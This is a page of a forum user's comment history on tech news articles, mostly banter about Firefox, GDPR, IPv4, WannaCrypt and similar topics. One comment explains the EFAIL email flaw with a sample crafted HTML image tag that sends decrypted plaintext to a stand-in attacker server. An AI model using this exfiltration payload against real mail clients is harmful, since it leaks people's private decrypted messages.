* Posts by Havin_it

1173 posts • joined 1 May 2008

Page:

Activists hate them! One weird trick Facebook uses to fool people into accepting GDPR terms

Havin_it

How about this?

Maybe a GDPR maven can answer this.

Where would the law stand on FB (or whoever) charging money for non-slurped access? (This might or might not include also not getting served ads, or that could be an additional pricing tier.)

Asking for a FriendFace...

1
0

S/MIME artists: EFAIL email app flaws menace PGP-encrypted chats

Havin_it

Re: Wuh?

Someone (possibly here yesterday) explained it thus: The attacker sends a crafted message with three MIME parts to it:

Part 1 (HTML)

<img src="http://badguyserver.cock/readmyplaintext.php?plaintext=

Part 2 (PGP / S/MIME)

[Previously-intercepted encrypted message]

Part 2 (HTML)

"/>

The silly mail client then glues all three into a single HTML part for display, and if it's REALLY silly it also goes right ahead and fetches the image, which passes the plaintext to $badguyserver in the URL (or as many characters thereof as the system allows for a URL string).

Hope I have that right; for some reason I'm loath to grace the vanity vuln-site with a click.

3
0

Waymo van prang, self-driving cars still suck, AI research jobs, and more

Havin_it
Happy

Waymo van prang

...surely has to be the name of a Dutch hard-house DJ.

1
0

Press F to pay respects to the Windows 10 April Update casualties

Havin_it

Re: "Upgrading users should be able to ignore the viewer as before."

My phone's data connection goes through the cabinet as well? Damn. I should try to get them to route mine through the cabinet near my mum's place, I always get better speeds there.

And if the problem's in the cabinet, how much help is the Windows manual going to be?

1
0

Oracle demands dev tear down iOS app that has 'JavaScript' in its name

Havin_it

CoffeeScript is already a thing, IIRC.

0
0
Havin_it

Re: Easily solved

How about ACMEScript - close to its parent standard, and likely to come top in alphabetical lists. And you get a free anvil and some dynamite with it.

1
0

BT pushes ahead with plans to switch off telephone network

Havin_it

PCI DSS and POS card terminals

At the moment (as far as I understand it) there is a sizeable difference in the compliance burden for PCI DSS between credit-card terminals that connect via dialup vs over the internet. To wit, terminal on dialup = can just self-certify; terminal over IP = have to get whole network audited regularly.

Doesn't moving to VoIP mean then that every bugger'll have to get audits done? Or will the exemption apply to it as well? Penny-pinching minds demand to know.

1
0

OK, this time it's for real: The last available IPv4 address block has gone

Havin_it
Alert

Re: "Nobody uses it..."

>A pox on it. We need IPv7 - just add another octet at the start of IPv6..

Couldn't we add one onto IPv4 instead and keep the rest of it the same? Then the hard-won skills of a multitude of consumer grannies (and me) could be transferred and nobody has to play how-many-colons bingo with that ridiculously opaque address scheme. Worked pretty well when we needed more phone numbers, amirite?

4
0

Mozilla's opt-out Firefox DNS privacy test sparks, er, privacy outcry

Havin_it

Re: Making DNS communication more secure

You get a notification in Firefox whenever a page attempts to play audio, telling you to install pulseaudio. How did you miss that?

0
0

Space, the final blunt-tier: Binary system ejected huge 'spliff' asteroid, boffins reckon

Havin_it

That's as may be

But my inner Grammarnazi is getting (erroneously) #triggered every time I clap eyes on that leading apostrophe.

3
0

Techies building UK web smut age check tools: You'll get a spec next week

Havin_it

Re: There has to be a better way to ensure children can't access porn.

>Then you're starving the revolutionaries

And here I thought I'd heard every euphemism for wanking already...

2
0
Havin_it

Re: I'm assuming

Not on the router, but you can on your pc/slab/etc so what the router says is ignored by it.

1
0

It's Pi day: Care to stuff a brand new Raspberry one in your wallet?

Havin_it

Really? If anyone utters or interprets "to $date" as excluding $date, I judge them an utter ocean-going See You Next Tuesday.

And don't get me started on people who say "next Tuesday" when they mean THIS Tuesday (Tuesday of THIS week). Nurse, make it a large one please....

0
0
Havin_it

Re: Dates

If your email platform requires your input in order to sort by date, I'd find a better one.

0
0

Suspected drug dealer who refused to poo for 46 DAYS released... on bail

Havin_it

Re: A very old, similarly themed joke from my childhood

After such an interminable set-up, I really was expecting a funny punchline. I sort of feel as if I should be calling the OFT or the ASA or someone about this.

4
1

Huawei's Not Hot Dog is possibly the Worst Tech Promo Ever

Havin_it

Implication

...that cats are fair game to run over?

13
0

Developer recovered deleted data with his face – his Poker face

Havin_it

Not to dilute your point, but it's ln <target> <linkname> innit?

1
0

If this laptop is so portable, where's the keyboard, huh? HUH?

Havin_it

Re: Obligatory pedantic quibble...

No, you misunderstand. Norman was primarily the company cook, specialising in stir-frys.

23
0

Due to Oracle being Oracle, Eclipse holds poll to rename Java EE (No, it won't be Java McJava Face)

Havin_it

Jolly Enterprising Edutainment for Business

or JEEBus.

1
0

Lily Cole: You'd hate me more if Impossible.com were a success

Havin_it

Quaequam blag! That is a downright grexnix slur-by-association upon Betelgeusian immigrants the length of the land! I suggest a prompt retraction, lest a Rigellian Hot-Shot be delivered with little warning!

0
0

Jocks in shock as Irn-Bru set to slash sugar and girder content

Havin_it

Re: Lite Ally Bru

I suppose, but "Made in Scotland from poagled mountain-bike frames" doesn't quite have the same ring to it.

(Actually, now I've sung it out loud, I like it better!)

0
0
Havin_it

Re: I wonder what it will do to it`s (odd) use as a mixer?

Shame, you were doing so well up until then... </wtfdidijustread>

1
0

Bye bye MP3: You sucked the life out of music. But vinyl is just as warped

Havin_it

Re: On air compression

Wanted to mention you can also add ReplayGain tags (both track and album) to FLAC files, the command-line app "metaflac" can do it. My player supports it, but YMMV.

The loudness issue used to drive me mad on my phone, but after much study I managed to patch the old Android (ICS) Music app to support ReplayGain on MP3s.

Only problem was when Jelly Bean came along and I recompiled the app, it now has "gapless playback" (i.e. a slight crossfade/segue) which when fading from a song with lots of gain applied to one with none or negative gain, there tends to be a split-second burst of EXTREME LOUDNESS until the equalizer adjusts it to where it should be for the next track. I must try to fix this at some point but I fear by then the AOSP app will be abandonware :(

2
0

PC repair chap lets tech support scammer log on to his PC. His Linux PC

Havin_it
Holmes

Re: Boobytrap a VM.

Mm, I wondered the same. Not sure the CMD shell can even do that on the host VM all that easily, let alone reaching back through the tubes and doing it to the VNC client's host machine.

Not to mention that if Hide Extensions is enabled (as has been default for quite some time), the mark might wonder why the file *has* a .TXT extension showing?

Now you could name it "Passwords.bat" but the icon would still be wrong. Worth a try would be creating the batchfile elsewhere and placing on the Desktop a shortcut to it, which IIRC you can change the icon of the shortcut.

But I'd still like that recipe for how this batchfile is pwning the intruder's machine. Still with us, OP?

Icon: closest available to "chinny reckon".

1
0
Havin_it

Re: ISP reports...

(in a couple case I even got a "recipient does not exist" response)

Now that *should* be enough to see action taken by their (the ISP's) TLD registry, as it violates RFCs, but I imagine for most of them this is equally fruitless.

What you can do however is report the offending IP (and in some cases the ISP's whole IP range if there is enough evidence of endemic misuse) to various spam blacklists (there are many). Then at least you're hopefully reducing the pain for others.

0
0

74 countries hit by NSA-powered WannaCrypt ransomware backdoor: Emergency fixes emitted by Microsoft for WinXP+

Havin_it

What the I don't even

I'm reading through the Cisco analysis as I speak, but I'm not yet seeing what's the excuse for being vulnerable to this.

Seems that it

(1) Spreads through unsecured SMB ports

Well what the fuck retard has their MSNet ports out there waving in the breeze of the general Internet in this day and age, FFS? I mean even MS don't sell you an OS any more that does such stupid things OOTB.

(2) Drops a binary, msseseccexxxesexypoo.exe (or something)...

Well how does it drop it and execute it without a by-your-leave? What browser/email client is allowing that to happen, because it doesn't magically happen without a parent vuln or colossally bad design decision to enable it.

I've only skimmed this info so far but please, someone, let me know if I can get this without having my SMB ports open to the WAN and/or ignoring some permutation of Windows/browser/emailer that won't shout at me "UR ABOUT TO RUN A PROGGY OFF TEH INTERNET IT MITE BE BAD ACTULY ITS PROLLY BAD Y/N" prior to executing a downloaded binary (which, Christ, Windows itself actually does a pretty good job of doing lately).

7
6

Just delete the internet – pr0n-blocking legislation receives Royal Assent

Havin_it

Re: Age verification

NGL, if they show me Ren & Stimpy I'll probably forget all about the porn objective.

0
0
Havin_it

Re: William Wallace

They'll have to prise it from my cold, damp hand.

0
0
Havin_it

Re: 'non-conventional'

>even having a wank could land you in hot water

Ugh, best avoid that. The lysis of the sperm cells in. pure water will render them extremely sticky and hard to remove. Soapy water is your friend. Er, so I'm told.

1
0

Flatpak and Snaps aren't destined for graveyard of failed Linux tech yet

Havin_it

Re: Faff

Most of the time Firefox binary release is fine, at times I've used that in preference to whichever distro's package, and that meant getting updates straight away too. I wish Libreoffice had a standalone installer as it's a nightmare trying to satisfy dependencies for Gentoo's binary package of it. I might give the Snap/Flatpak option a look.

1
0

Don't stop me! Why Microsoft's inevitable browser irrelevance isn't

Havin_it

@AC

Firefox accounts do use end-to-end encryption, so your 2nd and 3rd "rules" are moot. And if the data "being on someone else's computer" still bothers you that much in spite of this, the server software is all open-source so you can host it on your own computer if you want.*

* I did this myself and have to admit it is quite a battle to set it all up correctly, so in the end I asked myself why I was bothering and got a Firefox account instead. #NoRegrets

0
0

Can you make a warzone delivery drone? UK.gov wants to give you cash

Havin_it
Terminator

Re: My exact thought

"HEYYY! It looks like you're losing a gun-battle. Would you like some help?"

12
0

Why Firefox? Because not everybody is a web designer, silly

Havin_it
Boffin

Re: Need more variety, not less

Some impressively over-engineered solutions above, but this can be accomplished using Firefox alone. I use this feature myself to insulate extra-sensitive workloads from day-to-day omnivorous browsing. Just start Firefox's profile manager:

firefox -P

Create a new profile called e.g. 'banking'. When done, launch not this new profile but your original one (called 'default' by, er default).

Now, without closing Firefox, execute this:

firefox -no-remote -p banking

Voilà: a completely separate instance of Firefox running side-by-side with, but fully insulated from, your normal browsing. And because it's completely separate, you can customise the browser UI, add-ons and other preferences completely independently, to optimise them for the one or few sites you'll use it for.

4
0
Havin_it

Re: Designers..

This. I don't think they appreciate quite how big a kick in the market-share nuts the upcoming bonfire of the legacy add-ons is going to be. The current add-on ecosystem is the only thing besides sentimentality and inertia that's keeping me on board (though I certainly don't much fancy the alternatives either).

1
0

Opportunity rover gets bored of spot it's explored since 2014

Havin_it

Re: Football field

Or the suitably-descriptive-while-retaining-brevity: handegg.

9
0

Oh snap! UK Prime Minister Theresa May calls June election

Havin_it

Re: This goes to show one thing

>We could vote for 59 fluorescent macaques and it would have no effect.

I dunno, might liven up PMQs a bit. Let's try it.

0
0

Burger King's 'OK Google' sad ad saga somehow gets worse

Havin_it

Good point. There's a large (and disaster-prone) chunk of the planet that wouldn't be too happy wearing a picture of a cowburger on their chest, and another that'd be equally unwelcoming of anything featuring bacon.

1
0

Linux on Windows 10: Will penguin treats in Creators Update be enough to lure you?

Havin_it

Re: There are some uses for that

Esoteric setup!

Windows might not have its own sshd, but it's been possible since forever to set up Cygwin's sshd as a Windows service. I dunno if it could handle the Kerberos tokens as well but I don't see why not.

0
0

Firefox Quantum: BIG browser project, huh? I share your concern

Havin_it
Unhappy

Re: Multiprocess

I don't think any of the multiprocess code was rolled out as far back as 45.* (could be wrong).

If it is, you should be able to check in the about:support page. If it's present but not active, then as someone else said, it will be because you have an add-on installed that's not compatible with it.

To see which addons are and aren't compatible with multiprocess, you can install a Mozilla add-on called Add-on Compatibility Reporter; once installed, this will add (in-)compatibility labels to each installed add-on's listing in the add-ons screen.

Sadly, if you've been collecting add-ons for a while, you'll probably find quite a few marked incompatible. I'm using quite a few that are pretty indispensable, both at home and work, and which all evidence suggests are unlikely to be ported to WebExtensions* as the developers have long-since moved on. It will be a real wrench and I'm honestly not sure my fondness for the Fox can endure it; I fear the add-on catalogue will be a shadow of its former self soon, and with that goes a lot of what made it awesome. Sad times.

[* Because it's not just a question of replumbing extensions to work with multiprocess, oh no. The whole extension architecture is being thrown out and replaced with something [semi-]compatible with the WebExtension format as used by Chrome and Edge. So far, I've seen nothing to suggest that the possible gain of ease of porting addons from those browsers will outweigh the loss of the existing massive and diverse AMO collection.]

0
0

UK Home Office warns tech staff not to tweet negative Donald Trump posts

Havin_it
Trollface

Re: Yes, good idea

Doesn't flak usually come from underneath though?

23
0

Amid new push to make Pluto a planet again... Get over it, ice-world's assassin tells El Reg

Havin_it
Trollface

Ah, but the sentence is still grammatical and doesn't even change meaning if you delete "People", so there's no problem :)

0
0

Vapists rejoice! E-cigs lower cancer risk (if you stop smoking, duh)

Havin_it

>Nicotine produces the highest dependency score among common drugs, so one could argue that it is the most damaging, in an indirect way.

I'll hazard a guess that however this dependency score was arrived at, it involved study of smoking tobacco. There's recent research that suggests that nicotine by itself is far less addictive than other compounds found in burnt tobacco. (Sorry no citation, but you didn't give one either so yar boo sucks.)

Anecdotally, I've found I don't "crave" a vape in the way I very definitely used to go spare when denied the chance of a gasper.

2
0
Havin_it
Stop

Re: Aussie smokers are in for a rough ride.

Vaping's not an option, e-cigs are banned in Australia. It's in TFA, like.

Man, Australia sucks balls.

1
0

Former Mozilla dev joins chorus roasting antivirus, says 'It's poison!'

Havin_it

Re: Problem with Anti-Virus

Having a prescribed dropzone for downloaded files would be a royal ballache for me a lot of the time, though I'm not against it as a default for new users. What would be more beneficial to my mind, would be if downloaded files weren't executable by default and had to be explicitly OK'd as such by the user.

I've tried in the past to make Windows systems live up to that philosophy, typically by revoking execution permissions on all but one of a user's folders (and crucially not the default download folder) but this just tends to hit problems. 1: some apps have installation/update routines that fail if your TEMP folder doesn't have execute permissions; 2: the stupid-ass Windows permissions granularity where the key permission is "Read AND Execute" whereby if you revoke this permission from a given folder, you can download shit into it and be sure it won't execute, but unfortunately nor can the shell navigate that folder!

In short, a setup whereby the user is required to manually bless the execution of a downloaded file is not a goer without training or seriously crafty system configuration.

0
0

Microsoft's cmd.exe deposed by PowerShell in Windows 10 preview

Havin_it

Re: Yet another Windows 10 annoyance

>same reasons that UNIX / Linux systems still have a statically-linked (and therefore less dependent) subset of binaries in /sbin.

Mostly only true in the initrd nowadays, from what I've seen. And under systemd, you pretty much need an initrd if your system has any kind of mount that doesn't come up instantly :(

1
0

Gone in 70 seconds: Holding Enter key can smash through defense

Havin_it

initramfs shell?

So, um, what if you don't use an initramfs? I don't. Just wondering ...

1
0

2016 in a nutshell: Boffins break monkeys' backs to turn them into tragic shuffling cyborgs

Havin_it
Mushroom

Re: Delaying Hope

Well, you know, we could use what we learned to fix knackered (not by us) monkeys too. I doubt we will (outwith the class of vet practice Michael Jackson had for Bubbles back in the day), I'm just saying.

Don't be too hard on John. His language is a bit blunt, but he has a point and I find I largely agree with it (uh-oh). I don't desire the extinction of any species of life, nor inflicting suffering (a very difficult thing to quantify in less-sentient organisms, mind you) without purpose. However, it's unthinkable that humans could thrive as we do without exploiting other species in various ways, including lethal and "life-changing" ways. Polio is a lifeform, but I'd eradicate that in a heartbeat. It's all relative.

By and large, I'd sooner we cracked the technique of not doing unspeakable cruelty to our own species before we get to micromanaging the extent to which we're comfortable doing it to cows or monkeys. Because one way or another, we'll always be doing so. I challenge anyone to establish a "red line" on that which can't be argued against.

0
0

Panicked WH Smith kills website to stop sales of how-to terrorism manuals

Havin_it
Black Helicopters

Re: What's the thinking?

I hope you kept your Tor on when you admitted doing this while signed in to this (non-SSL) comment forum then. Oh, and that you've done so every time you've ever signed in to El Reg, otherwise Insp. Knacker of the Yard can pop down to Vulture Central and ID you right quick (if he can be arsed).

0
0

US citizens crash Canadian immigration site after Trump victory

Havin_it

Re: what eurocrats dont understand is..

Enter key broken?

2
0
Havin_it
Joke

Re: Canadian immigration

I don't advise requesting a blanket from a USAfriend, it may contain smallpox.

1
0

Page:

Forums

Biting the hand that feeds IT © 1998–2018